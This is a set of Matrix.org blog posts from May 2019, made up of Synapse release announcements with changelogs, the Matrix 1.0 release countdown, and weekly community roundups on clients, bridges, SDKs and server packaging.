Synapse 0.99.5.2 released

30.05.2019 00:00 — ReleasesNeil Johnson

0.99.5.2 contains a critical performance fix following a regression that was introduced in 0.99.5. Affected servers will have experienced increased CPU and RAM usage with a knock on effect of generally sluggish performance.

Separately, we are also looking into reports relating to further performance degradations that may have been introduced as part of 0.99.5, though consider the 0.99.5.2 fix to be a significant improvement on previous 0.99.5.x releases.

Please upgrade asap.

You can get the new update here or any of the sources mentioned at https://github.com/matrix-org/synapse. Note, Synapse is now available from PyPI, pick it up here. Also, check out our Synapse installation guide page.

🔗Synapse v0.99.5.2 Changelog

🔗Bugfixes

  • Fix bug where we leaked extremities when we soft failed events, leading to performance degradation. (#5274, #5278, #5291)

Final countdown to 1.0

24.05.2019 00:00 — GeneralMatthew Hodgson

Hi all,

After lots of refinements, polishing and a few distractions we’re finally at the point of announcing the final timeline for both Matrix 1.0 and Synapse 1.0! We are targeting Monday 10th June as our release date - please consider this your two week warning!

This is the end game of the process we began back in February when we released the first stable release of the Server-Server API at FOSDEM, and started the Synapse 0.99 release series to prepare for 1.0.

Matrix 1.0 refers to the upcoming set of API releases which provides a matched set of stable and secure APIs across all of Matrix - at which point the project (at last) exits beta! In practice, this will be Client-Server API 0.5 (including final membership lazy loading, E2E backups and interactive verification and lots more), SS API 0.2 (including server key validity period fixes and associated v5 room protocol) and any other spec updates. The next 2 weeks will see a flurry of spec activity as we get everything together - you can see the full list and track the progress for the CS 0.5 spec release at https://github.com/matrix-org/matrix-doc/projects/2.

Meanwhile, Synapse 1.0 will be the reference implementation of Matrix 1.0, and so makes the changes required to implement Matrix 1.0 and close all currently known security and stability issues and thus exit beta. This means changing the default room protocol version used for new rooms to be v4, which includes the new state resolution algorithm, as well as collision-resistant event IDs, which are now formatted to be URL safe. Support for v4 rooms shipped in Synapse 0.99.5.1, so please upgrade asap to 0.99.5.1 before 1.0 is released to ease the transition.. Synapse 1.0 will also ship with support for the upcoming v5 room protocol (which enforces honouring server key validity periods), but this will not used as the default for new rooms until sufficient servers are speaking Matrix 1.0.

As part of the security work, Matrix 1.0 and Synapse 1.0 also contains a breaking change that requires a valid TLS certificate on the federation API endpoint. Servers that do not configure their certificate will no longer be able to federate post 1.0

You can check that your server has been correctly configured here and see here for more info on what you need to do. If in doubt head to #synapse:matrix.org.

We've been tracking readiness for the certificate change at https://arewereadyyet.com, at the time of writing 68% of active servers on the federation have valid certificates. We obviously would want that number to be higher, however since the largest installations have upgraded the total number of users who are ready for 1.0 stands at 96%, which we consider to be high enough to release 1.0.

This is not a drill, from here until 10th June we need everyone to not only ensure that their own server is ready, but also to encourage their fellow admins to update as well. With your help we can get everyone over the line!

Thanks everyone for your help to date, especially those providing support in #synapse:matrix.org.

Onwards!

This Week in Matrix 2019-05-24

24.05.2019 00:00 — This Week in MatrixBen Parsons

🔗Matrix Live - Wilko, creator of Pattle 🎙

This week I chatted to Wilko, creator of Pattle.

🔗Dept of Servers 🏢

🔗Synapse

Neil:

Folks, big news this week as we announce that Synapse v1.0 is scheduled for release on 10th June - read all about it here

Aside from that we shipped v0.99.5.1 which (hopefully) is the penultimate release ahead of v1.0. Please, everyone upgrade to v0.99.5.1 because it implements rooms v4 which will be the default room version in Synapse v1.0.

0.99.5.1 also contains experimental support for edits and reactions which are currently hidden behind a Riot labs flag.

🔗Dendrite

Brendan:

Some activity has been happening this week in Dendrite-land, with Brendan adding support for Go modules to the project, and anoa adding SyTest runs to the project’s CI. These were two long-awaited maintenance works that will make working on Dendrite much easier in the future!

🔗Dept of SDKs and Frameworks 🧰

libQMatrixClient (that will soon become libQuotient) 0.5.2 has been released, with the sole purpose of fixing a nasty bug unmarking some direct chats when doing initial sync or a clean-cache start up. Everybody on 0.5.x branch is advised to upgrade.

🔗Dept of Clients 📱

🔗QMatrixClient to Quotient

kitsune:

The process of renaming QMatrixClient to Quotient has commenced - expect some turbulence while we're transitioning. The place for the repos is at https://github.com/quotient-im. Note that although the library repo name has changed, the old version of the library will continue releases under the old name (libQMatrixClient), and only in the master branch the library will be renamed. In most cases redirects should bring you home even if you request the old URL (thanks to GitHub); however, people with git repos are strongly advised to update their remotes to new URLs!

In other news:

For platforms that don't have a separate libQMatrixClient package (that is, Windows, macOS, Flatpak and AppImage), Quaternion 0.0.9.4 has been rebuilt with libQMatrixClient 0.5.2 - in the form of Quaternion 0.0.9.4c release.

🔗tangent

tangent is an embeddable HTML client from sanlox:

I added guest login, possibility to disable guest login, possibility to set own message limit on startup and various error messages. Cleaned up the code to make it more consistent and faster. Everything I wanted to have for this tiny embeddable web chat is now there so I'd consider it finished for now.

Check it out at: https://sanlox.dev/tangent/

🔗continuum

yuforia updated their JavaJX client:

minor changes in continuum this week:

  • updated controlsfx to version 11, which has better modularization support
  • sync issue indicator now uses NotificationPane from controlsfx, so now it has slide-in animation when it appears https://matrix.org/_matrix/media/v1/download/matrix.org/VtPORWFqBamfnuJtPtgEXWBs

🔗Neo now has image, video and general file sending

Fox:

Neo now supports sending multiple images, videos and files at once. You'll get a bar with previews, and the option to remove them from the queue/add more.
There's also been a bunch of changes to how events are handled. Images and videos should be much more robust against missing keys (no thumbnail, no information, etc), and there's basic displaying of the most common state events.
I also added an experimental media repository fallback option, which is disabled by default, and only implemented for room avatars. This allows you to provide a list of alternative homeservers Neo is allowed to try when your own homeserver can't load a piece of media.
Due to the loss of lain.haus, I lost admin access in the Neo room, so keep your eyes out for a new one when my infra is back.
I'm currently not really versioning anything, but I do push significant commits to https://neo.lain.haus/neo for people to try. Once it gets to a more useable state, I'll start adopting semantic versioning.

🔗Spectral update

Black Hat:

You can now paste images from the clipboard in Spectral. It is also possible to change room name and topic in room settings. A new release is pushed to Flathub to address direct room issues. Also there've been discussions about implementing custom room themes and backgrounds.

🔗Riot Web

  • Continued work on reactions and edits
  • New emoji font added to standardise emoji appearance and assist OS / browser combinations that don’t support emoji by default

🔗Riot Mobile

  • Continued work on reactions and edits
  • Riot-iOS has a new actions menu on event
  • Fix registration with an email

🔗Riot and RiotX available from F-Droid

krombel updated their Riot(X) F-Droid repos:

I finally found some time to update my fdroid repos which provide the development builds of riot and riotx. Now the builds of buildkite are part of the repos.
There are now 4 separate repos: One for each app and flavor. You can have a look at https://fdroid.krombel.de to find out the URL for the version you want to use.

Riot-dev (F-Droid; Repo; Build-Source)
    https://fdroid.krombel.de/riot-dev-fdroid
    https://fdroid.krombel.de/riot-dev-fdroid/fdroid/repo
    Fingerprint: 312E07B9444D0D1B615EBBAAC55EA4E5A54E123C3BEFCCA5D18B5E12DFC95BDC

Riot-dev (GPlay; Repo; Build-Source)
    https://fdroid.krombel.de/riot-dev-gplay
    https://fdroid.krombel.de/riot-dev-gplay/fdroid/repo
    Fingerprint: 81EDF1741A51B944B00B55E307C7AA043623CB646599182A104B895B6B319844

RiotX-dev (F-Droid; Repo; Build-Source)
    https://fdroid.krombel.de/riotx-dev-fdroid
    https://fdroid.krombel.de/riotx-dev-fdroid/fdroid/repo
    Fingerprint: FD146EF30FA9F8F075BDCD9F02F069D22061B1DF7CC90E90821750A7184BF53D
RiotX-dev (GPlay; Repo; Build-Source)

    https://fdroid.krombel.de/riotx-dev-gplay
    https://fdroid.krombel.de/riotx-dev-gplay/fdroid/repo
    Fingerprint: 5564AB4D4BF9461AF7955449246F12D7E792A8D65165EBB2C0E90E65E77D5095

🔗Dept of Bridges 🌉

🔗Major WhatsApp bridging update

tulir made great strides on mautrix-whatsapp this week:

I've been working on mautrix-whatsapp to add history bridging and Matrix puppeting.

  • New portals are populated with some history when creating them (exact count is configurable)
  • All messages missed during bridge downtime are backfilled
  • Creating portals is smarter now:
  • When logging in initially, it'll create portals for a few recent chats (count configurable).
  • It'll create portals when there are incoming messages as before, but it should no longer create portals for chats that only have old messages.
  • The missed message backfilling creates portals when necessary.

Matrix puppeting isn't quite finished yet. It can already use your Matrix account to bridge messages sent from whatsapp mobile, but it doesn't use the account to bridge EDUs (typing notifs, presence, read receipts) yet.

To make the history bridging a bit nicer, I made a PR to fix timestamp massaging in synapse: https://github.com/matrix-org/synapse/pull/5233. Timestamp massaging was removed from the spec in 1.0, but it wasn't intentionally removed from synapse, it just broke due to other changes. It was probably supposed to stay there as an easter egg until there's a proper solution for bridging history.

🔗Dept of Ops 🛠

Ananace pushed updated K8s images for Synapse 0.99.5

Bubu updated synapse on Arch:

Archlinux updated to synapse 0.99.5 as well after the requests, urllib3 incomopatibility thing was sorted out.

Mathijs updated the synapse avhost docker image:

With synapse v 0.99.5.1 the avhost docker image has finally moved to python 3

🔗Dept of Services 🚀

🔗Modular

New widget for Scalar: EtherCalc.

🔗Dept of Bots 🤖

🔗QuatBot

Very very new, let's take a look at QuatBot, which uses libQuotient:

QuatBot is a simple meeting-management bot for use with the Matrix. Taking turns during an online meeting -- and making sure everyone gets to have their say -- takes a bit of organizing, and this bot helps you do that. QuatBot runs as a command-line application.

🔗Dept of Articles 📝

uhoreg wrote a really informative article about key verification:

For those who want to know more about the security behind emoji-based key verification, I've written a blog post about it: https://www.uhoreg.ca/blog/20190514-1146

🔗Dept of GSOC 🎓

🔗GSoC 2019 – Reliable Bridges

Thanks Kai for this introduction to his project:

The Reliable Bridges GSoC project is about implementing a feedback mechanism for the Matrix network in cases where bridges are not able to properly handle messages. Currently clients are unable to know if a message was successfully sent over a bridge. With the new mechanism in place they get the information about errors happening at bridges and can behave accordingly by e.g. notify the user of the failed delivery.

The implementation is foremost focused on the matrix-appservice-dicord bridge which uses the underlying matrix-appservice-bridge. A JS bridge was chosen so that as much code as possible is brought into the SDK and other bridges can profit sooner from the work done.

The first step for implementing the new feature will be the signaling of permanent errors occurring at the bridge (in contrast to temporary failures). They might occur e.g. when the sending account was banned on the bridged foreign network. These permanent errors will be implemented as a new type of PDU originating from the bridge.

After permanent errors are done, the subsequent weeks will see work on temporary failures which might include work on Synapse as well as work on Riot Web to have a client which actually uses the new events. As these events are new features being introduced there will also be a MSC draft. There everyone can check out the proposed solution and tear it apart with their criticism (if applicable 😉).

For discussions related to the GSoC project or when you have some opinions on how the MSC should look like, you are invited to join the Reliable Bridges Matrix room.

🔗That's all I know 🏁

Finally Alan, friend of Matrix and creator of TADHack and TADSummit is doing an "Open Source Telecom Software Survey" - if you could add value to this research by completing it please do so here: http://alanquayle.com/2019/05/open-source-telecom-software-project-survey/

See you next week, and be sure to stop by #twim:matrix.org with your updates!

Synapse 0.99.5.1 released!

21.05.2019 00:00 — ReleasesNeil Johnson

Okay folks, this is an important one. v0.99.5.1 will be the last release before we ship Synapse v1.0. It is really important that you upgrade to v0.99.5.1 because it implements rooms version 4 - which is the room version that Synapse 1.0 will default to.

This means that Synapse 1.0 servers will create new rooms as version 4 by default and servers that have not upgraded to at least v0.99.5.1 will not be able to join those rooms.

Over the coming days we will announce a release day for Synapse v1.0, the idea is to give admins 2 weeks notice so that anyone yet to configure their federation SSL certificate has time to do so. This is important, failure to configure your certs will mean not being able to federate with v1.0 servers. If you are not sure if you certs are valid, you can test here and read here for more info on what to do.

Aside from room v4, this release also includes the ability to blacklist specific IPs from federating as well as experimental support for edits and reactions. We are not quite ready to mark the feature 'done done', but it is very close. Watch out for news as the feature lands properly.

We're really close to v1.0 now, give us a few more days and we'll announce an official release date.

As ever, you can get the new update here or any of the sources mentioned at https://github.com/matrix-org/synapse. Note, Synapse is now available from PyPI, pick it up here. Also, check out our Synapse installation guide page

🔗Synapse v0.99.5.1 Changelog (since v0.99.4)

🔗Features

  • Add ability to blacklist IP ranges for the federation client. (#5043)
  • Ratelimiting configuration for clients sending messages and the federation server has been altered to match login ratelimiting. The old configuration names will continue working. Check the sample config for details of the new names. (#5181)
  • Drop support for the undocumented /_matrix/client/v2_alpha API prefix. (#5190)
  • Add an option to disable per-room profiles. (#5196)
  • Stick an expiration date to any registered user missing one at startup if account validity is enabled. (#5204)
  • Add experimental support for relations (aka reactions and edits). (#5209, #5211, #5203, #5212)
  • Add a room version 4 which uses a new event ID format, as per MSC2002. (#5210, #5217)

🔗Bugfixes

  • Fix image orientation when generating thumbnails (needs pillow>=4.3.0). Contributed by Pau Rodriguez-Estivill. (#5039)
  • Exclude soft-failed events from forward-extremity candidates: fixes "No forward extremities left!" error. (#5146)
  • Re-order stages in registration flows such that msisdn and email verification are done last. (#5174)
  • Fix 3pid guest invites. (#5177)
  • Fix a bug where the register endpoint would fail with M_THREEPID_IN_USE instead of returning an account previously registered in the same session. (#5187)
  • Prevent registration for user ids that are too long to fit into a state key. Contributed by Reid Anderson. (#5198)
  • Fix incompatibility between ACME support and Python 3.5.2. (#5218)
  • Fix error handling for rooms whose versions are unknown. (#5219)

🔗Internal Changes

  • Make /sync attempt to return device updates for both joined and invited users. Note that this doesn't currently work correctly due to other bugs. (#3484)
  • Update tests to consistently be configured via the same code that is used when loading from configuration files. (#5171, #5185)
  • Allow client event serialization to be async. (#5183)
  • Expose DataStore._get_events as get_events_as_list. (#5184)
  • Make generating SQL bounds for pagination generic. (#5191)
  • Stop telling people to install the optional dependencies by default. (#5197)

This Week in Matrix 2019-05-17

17.05.2019 00:00 — This Week in MatrixBen Parsons

🔗Matrix Live - Reactions and Edits coming to Matrix

If Since you've been chatting on Matrix this week, you'll have noticed some new features rolling out.

In Riot develop, hit Labs in the Settings menu and you'll be able to try out the new Reactions and message editing features.

🔗Dept of Servers

🔗Synapse

Neil said:

This week we shipped 0.99.4 - no stand out ‘oh my gosh’ headlines, just lot lot of bug fixes and perf improvements - get involved. We’ve also been working hard to getting things like reactions and edits going, as well more prep for improving perf for small server instances.

🔗Construct

First Construct update for a few weeks:

Construct has added a server command line available in any room when starting a line with a special character (by default it's '\'). The commands are private so the room doesn't actually see it. More on this next week, or check out #test:zemos.net.

🔗Dept of SDKs and Frameworks

🔗Ruby SDK now 1.0!

Big news from Ananace this week:

Finished getting the test coverage to a reasonable enough percentage to feel comfortable releasing the Ruby Matrix SDK as a nice and stable 1.0 (.0)

This is great! All Rubyists should check it out. Ananace notes:

I still need to set up fixtures for all the API endpoints I'm exposing so I can verify every single API call as well, but I see that as a later thing as that relates mostly to how the other side (the HS) handles my input, not to how the SDK itself handles said input

🔗Dept of Clients

🔗Pattle

Wilko:

A new version of Pattle is available on F-droid!

Changes include:

  • Implement direct chats correctly!
    • Use user user avatar as chat avatar if direct
    • Hide user name in direct chat
  • Use names of room members if no room name is set (whether the chat is direct or not)
  • Add border to left of replied-to messages to easily differentiate them
  • Show redaction events!
  • Use icons instead of letters if chat has no avatar
    • Use different icons for direct chats than group chats (and in the future public chats)
  • Use user color for direct chats if the user has no avatar
  • Simplify member change messages ('Pat has joined' -> 'Pat joined', etc)
  • Tweak font sizes (thanks to Mathieu Velten)!
  • Change date header style (smaller and full caps)

Development happens here and development discussion happens here: #pattle:matrix.org!

To install this release, add the following repo in F-droid:

https://fdroid.pattle.im/?fingerprint=E91F63CA6AE04F8E7EA53E52242EAF8779559209B8A342F152F9E7265E3EA729

And install 'Pattle'.

🔗Riot (various)

This week the various Riot teams (web, iOS, Android) have been spending time implementing reactions/edits, but also:

🔗Riot Android

  • PR review from community: Matomo SDK will replace Piwik SDK
  • Weblate is up again, a sync has been done.

🔗RiotX (Android)

  • Crypto integration is still ongoing
  • Reactions are coming soon!
  • New home and navigation to rooms development started

🔗tangent

tangent is an exciting young project designed to create a very lightweight browser-based new client. sanlox:

did alot of changes on tangent to make it more stable and performant, only registration and guest login are left to do, git changed to https://gitlab.com/sanlox/tangent

Test the latest at: https://sanlox.dev/tangent/

🔗Spectral timeline UI and more

Black Hat:

  • Polished the timeline UI for Spectral.
  • Added m.video support.
  • Also added drag-and-drop support in Spectral.

🔗Fractal now with keyboard shortcuts

Alexandre Franke:

Ana, first time contributor, added a bunch of cool keyboard shortcuts to ease navigation in Fractal. One can now e.g. go down to the next room with unread messages with ctrl+shift+page down.

🔗continuum updates

yuforia:

  • Load message history from server lazily when scrolling
  • Loaded messages are always saved to disk, so if you aren't offline for too long, only a few messages will need to be fetched the next time you login
  • The screenshot also shows the UI for handling invitations

🔗early-day reactions support in Quaternion

kitsune:

This week was too packed IRL but I took an hour to experiment with reactions that are a rage in riot.im/develop these days. An experimental "kitsune-reactions" branch understands reaction events and allows clients to further process them. A proof-of-concept in Quaternion will land over the weekend.

🔗Scylla

via Aaron Raimist:

Update on Scylla from VaNilLa: Though I am very busy with schoolwork, I found time to fix a long-standing issue: the names of private messages showing up as <No Name>. this is gone now, and rooms are sorted alphabetically to make it easier to navigate.
Try Scylla here: https://scylla.danilafe.com
Come join us in #scylla:riot.danilafe.com to discuss

🔗Dept of Bridges

🔗matrix-appservice-discord 0.5.0

Half-Shot:

Evening, we've just cut the first RC of matrix-appservice-discord 0.5.0. Most of the changes this time around are bugfixes to formatting, internal re-architecturing / performance boosts and shifting more things to the database. Please help test if you run an instance, so we can get a 0.5.0 out swiftly. The next release has a lot of features planned for it 😉

Also - congratulations to Half-Shot on finishing all his final-year exams! How will you fill your time now?

🔗mautrix-telegram/mautrix-hangouts/mautrix-facebook/mautrix-whatsapp

Think tulir's been busy this week?

Lots of small changes in my projects:

  • mautrix-telegram had a bunch of bugs fixed, like multiline messages from some clients not being bridged correctly.
  • mautrix-hangouts got matrix->hangouts image bridging and some bugfixes.
  • mautrix-facebook also got some bugfixes.
  • mautrix-whatsapp now informs the user about connection problems rather than crashing and has commands to try to reconnect. It also now bridges redactions in both directions.

🔗Dept of Ops

🔗kubernetes from Ananace

Ananace updated their k8s packaging for Synapse to 0.99.4: https://github.com/ananace/matrix-synapse

🔗Debian Packages

andrewsh announced the Debian Matrix Packagers Team has its own dedicated blog

for everything about Matrix on Debian, join #debian-matrix:matrix.org

🔗silvio/avhost synapse docker container

Mathijs:

the silvio/avhost synapse docker container is making progress in moving to python 3, the container is made smaller and no longer runs synapse as root

There are some important differences between this and https://github.com/matrix-org/synapse/tree/master/contrib/docker:

it puts all the configuration files, logfiles and media files in the volume, you don't really configure it with environmental variables but just by editing the homeserver.yaml file in the volume, and it also contains coturn

🔗Dept of Bots

Half-Shot created a "reactbot":

Hot on the heels of the rapid developments of the reaction work, I've written a bot that automatically reacts when spotting certain phrases inside rooms. Honestly I have no idea what the use case is for this, but it exists and I currently use it to stick the :dog: reaction on every dog related event. https://github.com/Half-Shot/matrix-reactbot

The bot is also now used in #twim:matrix.org, whhere it performs the needed work of adding red circles to submissions.

tulir's karma maubot now also supports reactions and redactions, and the maubot sed plugin now underlines changes in messages.

🔗Dept of Status of Matrix

🔗t2bot.io has launched a new website

TravisR:

t2bot.io has launched a new website, surpassed a milestone of 300k total bridged users (70k of those are active monthly), and launched 2 new early-beta-quality bridges. If you're looking to try out tulir's latest Hangouts or Facebook Messenger bridge then t2bot.io is an option for that, assuming you don't mind the occasional bug, missing feature, or problem. Check out https://t2bot.io/hangouts/ and https://t2bot.io/messenger/ for setup instructions.

🔗That's all I know

See you next week, and be sure to stop by #twim:matrix.org with your updates!

PS Massive thanks to Aaron Raimist for doing the needful to make full articles appear in RSS!

Synapse 0.99.4 released!

15.05.2019 00:00 — ReleasesNeil Johnson

Hey ho Synapse release day.

0.99.4 is a maintenance release collecting together all of the bug fixes and performance improvements over the past few weeks, additionally there is further support for the upcoming 1.0 release (more info coming soon). One thing worth calling out is how many community contributions have made their way into 0.99.4, take a look at the change log for details, but many thanks to everyone submitting PRs, keep them coming!

As ever, you can get the new update here or any of the sources mentioned at https://github.com/matrix-org/synapse. Note, Synapse is now available from PyPI, pick it up here. Also, check out our Synapse installation guide page

🔗Synapse 0.99.4 Changelog

🔗Features

  • Add systemd-python to the optional dependencies to enable logging to the systemd journal. Install with pip install matrix-synapse[systemd]. (#4339)
  • Add a default .m.rule.tombstone push rule. (#4867)
  • Add ability for password provider modules to bind email addresses to users upon registration. (#4947)
  • Implementation of MSC1711 including config options for requiring valid TLS certificates for federation traffic, the ability to disable TLS validation for specific domains, and the ability to specify your own list of CA certificates. (#4967)
  • Remove presence list support as per MSC 1819. (#4989)
  • Reduce CPU usage starting pushers during start up. (#4991)
  • Add a delete group admin API. (#5002)
  • Add config option to block users from looking up 3PIDs. (#5010)
  • Add context to phonehome stats. (#5020)
  • Configure the example systemd units to have a log identifier of matrix-synapse instead of the executable name, python. Contributed by Christoph Müller. (#5023)
  • Add time-based account expiration. (#5027, #5047, #5073, #5116)
  • Add support for handling /versions, /voip and /push_rules client endpoints to client_reader worker. (#5063, #5065, #5070)
  • Add an configuration option to require authentication on /publicRooms and /profile endpoints. (#5083)
  • Move admin APIs to /_synapse/admin/v1. (The old paths are retained for backwards-compatibility, for now). (#5119)
  • Implement an admin API for sending server notices. Many thanks to @krombel who provided a foundation for this work. (#5121, #5142)

🔗Bugfixes

  • Avoid redundant URL encoding of redirect URL for SSO login in the fallback login page. Fixes a regression introduced in #4220. Contributed by Marcel Fabian Krüger ("zaugin"). (#4555)
  • Fix bug where presence updates were sent to all servers in a room when a new server joined, rather than to just the new server. (#4942, #5103)
  • Fix sync bug which made accepting invites unreliable in worker-mode synapses. (#4955, #4956)
  • start.sh: Fix the --no-rate-limit option for messages and make it bypass rate limit on registration and login too. (#4981)
  • Transfer related groups on room upgrade. (#4990)
  • Prevent the ability to kick users from a room they aren't in. (#4999)
  • Fix issue #4596 so synapse_port_db script works with --curses option on Python 3. Contributed by Anders Jensen-Waud [email protected]. (#5003)
  • Clients timing out/disappearing while downloading from the media repository will now no longer log a spurious "Producer was not unregistered" message. (#5009)
  • Fix "cannot import name execute_batch" error with postgres. (#5032)
  • Fix disappearing exceptions in manhole. (#5035)
  • Workaround bug in twisted where attempting too many concurrent DNS requests could cause it to hang due to running out of file descriptors. (#5037)
  • Make sure we're not registering the same 3pid twice on registration. (#5071)
  • Don't crash on lack of expiry templates. (#5077)
  • Fix the ratelimting on third party invites. (#5104)
  • Add some missing limitations to room alias creation. (#5124, #5128)
  • Limit the number of EDUs in transactions to 100 as expected by synapse. Thanks to @superboum for this work! (#5138)
  • Fix bogus imports in unit tests. (#5154)

🔗Internal Changes

  • Add test to verify threepid auth check added in #4435. (#4474)
  • Fix/improve some docstrings in the replication code. (#4949)
  • Split synapse.replication.tcp.streams into smaller files. (#4953)
  • Refactor replication row generation/parsing. (#4954)
  • Run black to clean up formatting on synapse/storage/roommember.py and synapse/storage/events.py. (#4959)
  • Remove log line for password via the admin API. (#4965)
  • Fix typo in TLS filenames in docker/README.md. Also add the '-p' commandline option to the 'docker run' example. Contributed by Jurrie Overgoor. (#4968)
  • Refactor room version definitions. (#4969)
  • Reduce log level of .well-known/matrix/client responses. (#4972)
  • Add config.signing_key_path that can be read by synapse.config utility. (#4974)
  • Track which identity server is used when binding a threepid and use that for unbinding, as per MSC1915. (#4982)
  • Rewrite KeyringTestCase as a HomeserverTestCase. (#4985)
  • README updates: Corrected the default POSTGRES_USER. Added port forwarding hint in TLS section. (#4987)
  • Remove a number of unused tables from the database schema. (#4992, #5028, #5033)
  • Run black on the remainder of synapse/storage/. (#4996)
  • Fix grammar in get_current_users_in_room and give it a docstring. (#4998)
  • Clean up some code in the server-key Keyring. (#5001)
  • Convert SYNAPSE_NO_TLS Docker variable to boolean for user friendliness. Contributed by Gabriel Eckerson. (#5005)
  • Refactor synapse.storage._base._simple_select_list_paginate. (#5007)
  • Store the notary server name correctly in server_keys_json. (#5024)
  • Rewrite Datastore.get_server_verify_keys to reduce the number of database transactions. (#5030)
  • Remove extraneous period from copyright headers. (#5046)
  • Update documentation for where to get Synapse packages. (#5067)
  • Add workarounds for pep-517 install errors. (#5098)
  • Improve logging when event-signature checks fail. (#5100)
  • Factor out an "assert_requester_is_admin" function. (#5120)
  • Remove the requirement to authenticate for /admin/server_version. (#5122)
  • Prevent an exception from being raised in a IResolutionReceiver and use a more generic error message for blacklisted URL previews. (#5155)
  • Run black on the tests directory. (#5170)
  • Fix CI after new release of isort. (#5179)

This Week in Matrix 2019-05-10

10.05.2019 00:00 — This Week in MatrixBen Parsons

🔗Matrix Live

This week Neil and Matthew are talking about recent security issues - this is a really long and detailed chat, but you can skip to around the 32 minute mark to hear about other news - including progress on reactions. Reminder that for a good "big picture" overview of the progress of Matrix, you can look at the Homeserver High Level Roadmap.

🔗Dept of Servers

🔗Synapse

Neil, Synapse-dev wrangler:

Reactions continues at full speed, we have a draft PR and will be implementing over the coming week. The ability to blacklist IPs over federation will land imminently, as well as a nasty device management bug that led to a spate of E2E errors. Next week is all about Reactions, resuming work on the small homeserver project and finally getting back to Synapse 1.0 blockers following all the remediation drama of the past few weeks. With any luck we’ll have a new Synapse release for you next week.

🔗Dept of Encryption

🔗Pantalaimon

Says poljar:

  • Pantalaimon received a configuration file. The configuration file adds the ability to configure multiple Homeservers and pantalaimon will run having each Homeserver exposed on a different TCP port.
  • The panctl utility has received support for more commands, it now has the ability to accept SAS requests, confirm them, import/export keys, list pan users as well as list devices of users. Completions for the commands were also added.

🔗Dept of Clients

🔗Pattle - big update!

Wilko announced:

A new version of Pattle is available on F-droid!

Lots of changes again, including:

  • Render HTML formatting in messages!
  • Replies are now rendered!
  • Show date headers between messages of different days!
  • Render usernames with a color in chat timeline
  • Add loading indicators (when logging in, loading chats, etc.)
  • Show error banner at the top if syncing failed
  • Syncing now resumes after a failed attempt (no more restarting)
  • Fix messages not being sent if connection was lost and the app restarted

To install Pattle, add the following repo in F-droid:

https://fdroid.pattle.im/?fingerprint=E91F63CA6AE04F8E7EA53E52242EAF8779559209B8A342F152F9E7265E3EA729

Follow development here and in #pattle:matrix.org!

🔗Fractal

Alexandre Franke:

Although the development pace has been reduced lately, the Fractal team managed to make significant progress towards the 4.2 release. More specifically since our previous news, Chris has landed much of his adaptive view work to get Fractal in a mobile friendly state so it’s ready to run on the Librem 5 once Purism starts shipping them. But he didn’t stop there: eager to see his awesome work in the hands of many people (figuratively, the literal application will have to wait for the phone to be out 😛) as soon as possible, he tackled a few bugs that we really wanted to get sorted out before we got a new version out.

Alexandre also prepared the changelog with a bird’s-eye view of all changes that happened since 4.0.

Last but not least, we had a few external contributions for features such as network proxy support and typing notifications.

🔗Riot Web

Progress on message composer for editing messages.

🔗Riot iOS

  • 0.8.6 has been released on Tuesday
  • We are working on reactions

🔗Riot Android

  • We have fixed some minor bugs, our efforts are now on RiotX
  • New FDroid mode support for high service level, regardless of battery usage.

🔗RiotX (Android)

  • Benoit has started to implement the crypto on RiotX. Basically all the legacy has been imported and a migration to the new architecture is done. Lots of plumbing and rework, but it should be the fastest way to support crypto on RiotX.
  • Valere is working on the emoji picker and reactions, and has also added some actions on events (copy, share, view source, etc.)
  • François has added room invitation support. It will be possible soon to see invitations, and accept or reject them.

🔗continuum

yuforia has news on continuum, a JavaFX-based client.

this week in continuum

  • right-click on a room in the room list to send invitations
  • experimental support for receiving invitations
  • membership data are now also persisted in database

🔗FluffyChat available as a Snap package, plus E2EE progress

Krille announced FluffyChat for Linux desktops:

FluffyChat is now also available as a Snap package for desktop Linux
https://snapcraft.io/fluffychat :D
It's a Matrix client written in Qml for Ubuntu Phones. Now it is working for Linux Desktop too.

He also has news to share re E2E:

Progress has been made at the end2end encryption for FluffyChat. Qml bindings for the libolm library are mostly ready and the app can now create keys and upload keys to the server. Device tracking is now implemented too.

E2E when? SOON! See the branch here: https://gitlab.com/ChristianPauly/fluffychat/tree/e2eencryption

🔗Dept of Bridges

🔗New Hangouts bridge from tulir / mautrix

tulir has been using his mautrix-python lib, which was recently used to enable his mautrix-facebook bridge, to bring a new method for Matrix-Hangouts bridging:

New bridge again, this time it's Hangouts: https://github.com/tulir/mautrix-hangouts / #hangouts:maunium.net. As with the Messenger bridge, currently the main difference to matrix-puppet-hangouts is multi-user support (also no hacky JS/Python mixing).

Before making mautrix-hangouts, I put a bunch of the generic bridging parts of mautrix-facebook into mautrix-python's bridge module and used that in both bridges. After Debian 10 is released, I'll drop Python 3.5 compatibility in mautrix-telegram and move it to use mautrix-python and the bridge module too.

Next week I'm planning on adding a bunch of features to both my new bridges, such as bridging formatting and remaining media types (so no new bridges planned for now :D).

🔗Dept of SDKs and Frameworks

🔗QMatrixClient is now "Quotient"

kitsune:

The vote on a new name for the QMatrixClient project has been going on over the past week.
We have a winner now, and the new name is "Quotient"! In the nearest weeks, expect changes in the library code (it's going to be libQuotient from the next release), room aliases (already ongoing), links to the repos etc. etc. Where possible, we're going to smoothen the migration path by providing legacy fallbacks (e.g., the new C++ namespace, Quotient, will be introduced but the old one, QMatrixClient, will stay its synonym, although deprecated).
Just in case you missed all the previous mentions of the topic - it's only related to the overall project and the library, but not the client - its name remains Quaternion.

Why rename?

Because the previous name has been a bit clumsy and, most importantly, the project is no more focusing just on client-side but on a wider set of applications of Matrix (no homeserver in plans though). See also the recent backlog of #qmatrixclient:matrix.org (now also #quotient:matrix.org) earlier this week for the whole discussion

🔗Ruby Matrix SDK hits v0.1.0

Ananace:

Just published version 0.1.0 of the Ruby Matrix SDK, and I've gotten enough testing written now where I feel comfortable not marking this as a pre-production release. So feel free to integrate it into more than just prototypes and experiments. 😃
Relevant links; GitHub page, #ruby-matrix-sdk:kittenface.studio.

🔗Opsdroid big updates, with focus on Matrix

Cadair:

Opsdroid 0.15 has been released, with a lot of matrix focused updates. The biggest of which is support for sending and receiving images and files. There have also been a bunch of bug fixes such as clean exit of the matrix connector and correct handling of events which are not parsed. There are also a bunch of other not matrix specific changes like support for the awesome parse library for string matching. Read all about it in the release blog: https://medium.com/opsdroid/event-dispatching-simple-parsing-and-more-in-v0-15-3f721b8a6d6c

🔗PK interfaces for ruby_olm

Willem:

This week I've been adding PK interfaces to cjhdev's Ruby bindings for Olm, in preparation of improving my Tchap proxy. The PK interfaces can be found in my fork of ruby_olm. Building the native extensions for the gem has had a major overhaul, so no pull request yet.

🔗Dept of Ops

🔗matrix-docker-ansible-deploy update

